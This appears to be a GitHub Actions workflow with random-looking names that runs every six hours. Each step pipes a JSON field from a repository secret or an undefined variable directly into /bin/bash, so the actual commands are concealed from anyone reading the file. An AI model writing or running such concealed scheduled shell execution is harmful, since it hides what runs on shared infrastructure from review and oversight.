name: jutibangxin
on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jutibangxin
        env:
          qie93: ${{ secrets.qie93 }}
        run: |
          echo $qie93 | jq -r .xbesh15222 | /bin/bash
          echo $mznsy8948 | jq -r .cy427 | /bin/bash
          echo $tzsf64 | jq -r .erog95 | /bin/bash
          echo $pwh96267 | jq -r .pbq1205 | /bin/bash
          echo $c99 | jq -r .tiawo47 | /bin/bash

